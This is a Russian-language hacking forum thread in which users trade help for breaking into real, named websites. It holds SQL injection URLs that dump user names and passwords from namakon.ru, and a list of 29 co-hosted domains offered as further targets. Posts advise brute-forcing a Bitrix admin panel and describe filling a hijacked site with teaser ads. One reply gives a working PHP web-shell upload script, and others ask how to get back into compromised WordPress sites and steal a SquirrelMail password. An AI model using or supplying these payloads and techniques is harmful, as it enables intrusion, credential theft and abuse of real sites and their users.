Вот, по идее, всё правильно: _http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,group_concat(concat_ws(0x3a3a3a,id,name,passwd)+separator+0x0b),4,5,6,7,8,9+from+users+limit+0,20-- Что не так? помогите!!!
http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,count(*),4,5,6,7,8,9+from+users+--+ Она пустая.
Как такое может быть вообще?! Первый раз с таким сталкиваюсь... И что подскажете? Если на этом сайт ещё найду уязвимости, результат будет тот-же?!
Подпишусь под вышенаписанным и спрошу совета у знатоков. Есть подобная ситуация, на сайте 3 базы, 2 местные и information_schema, ни в одной ни единого пользователя, как быть?
Да. Ищи уязвимости на этом сервере на остальных сайтах, может быть, там прорвешься: # Домен 1 www.catalonia-online.com 2 elsteel.ru 3 www.namakon.ru 4 www.calc.ru 5 www.extrimdrive.ru 6 sodiamex.ru 7 www.2dstudio.ru 8 www.duol.ru 9 www.artsok.com 10 italia-online.ru 11 www.analizfamilii.ru 12 stroylist.ru 13 www.forum.analizfamilii.ru 14 www.cronstudio.ru 15 autoledy.ru 16 www.mosdoma.ru 17 cron.ru 18 roof-style.com 19 citymulti.ru 20 vtecktonik.ru 21 frivent.ru 22 autoledi.ru 23 www.militaryband.ru 24 smstechsupport.ru 25 www.evstyle.ru 26 expolink.ru 27 zookormushka.ru 28 www.superdog.ru 29 www.stroyelite.ru
админка в битриксе брутится без проблем, так что вперёд -- Вопрос:был доступ к сайту, напичкал его тизерами, зашёл админ (по сайту видно). Больше я зайти не могу. Опять залез в дырку - пароль тот же что и раньше, но заёти не могу. Деды, прокси, впн пробовал, не заходит. Что делать?
Ты даешь слишком мало информации, вопрос из разряда: "Была у меня белая шляпа - потерял, пробывал одевать на голову котелок, чайник >> не получилось. Как быть?" P.S. Osstudio ака IScript очень неудачный тролль
Есть пхп-инъекция в скрипте, сервер под виндой. Не могу залить шелл средствами пхп (fopen, copy и тп). Какие еще существуют способы залиться на виндовый сервер? Буду благодарен любой помощи.
движок вордпресс. кинопортал. иностранный. один день был в моём распоряжении через лог и пасс админа. На следующий день сменилась пара баннеров, появилась капча на входе в админку. Не могу войти, не понимаю почему. Через раскрученную скулю достаю пароль админа, который совпадает с тем, через который удачно заходил, но не могу зайти. Больше инфы нету
scr1m77 PHP: <?php if(@copy($_FILES["shell"]["tmp_name"], dirname(__FILE__).'/'.$_FILES["shell"]["name"])) print 'ok'; else print '<form method=post enctype="multipart/form-data"><input type="file" name="shell"><input type="submit"></form>';?>
Ну ты даешь. Тизерами напичкал. У тебя с головой все нормально? Много поднял на тизерах то за один день? А насчет админки - наверное, ввели вход только для админского ip Где-то в районе /var/lib/mysql/ Но 99% что ты не сможешь прочитать файлы там или даже войти в папку.
Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?
